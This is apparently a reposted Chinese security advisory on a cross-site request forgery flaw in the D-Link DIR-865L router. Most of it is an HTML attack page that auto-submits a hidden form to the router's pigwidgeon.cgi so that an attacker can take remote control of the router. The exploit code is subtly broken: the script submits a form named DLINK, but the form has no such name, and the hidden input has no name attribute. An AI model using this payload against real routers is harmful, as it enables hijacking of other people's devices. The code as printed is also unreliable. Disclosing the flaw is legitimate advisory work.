865L 跨站请求伪造漏洞(2)

-------------------------- Figure 2. Attack page 2. --------------------------
    <html>
    <head>
    <title> D-LINK DIR-865L CSRF</title>
    <!-- Firmware: 1.03 Fri 02 Nov 2012 -->
    </head>
 
    <body>
 
    <form action="http://192.168.0.1/pigwidgeon.cgi" method="post">
    <input type="hidden" value="SETCFG,SAVE,ACTIVATE">
    </form>
 
    <script>
    document.DLINK.submit()
    </script>
 
    </body>
    </html>
 -------------------------- Figure 2. Attack page 2. --------------------------
 
At this point, the attacker can remotely administer, and thereby remotely control the router.

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
D-Link
 ------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/ppdff.html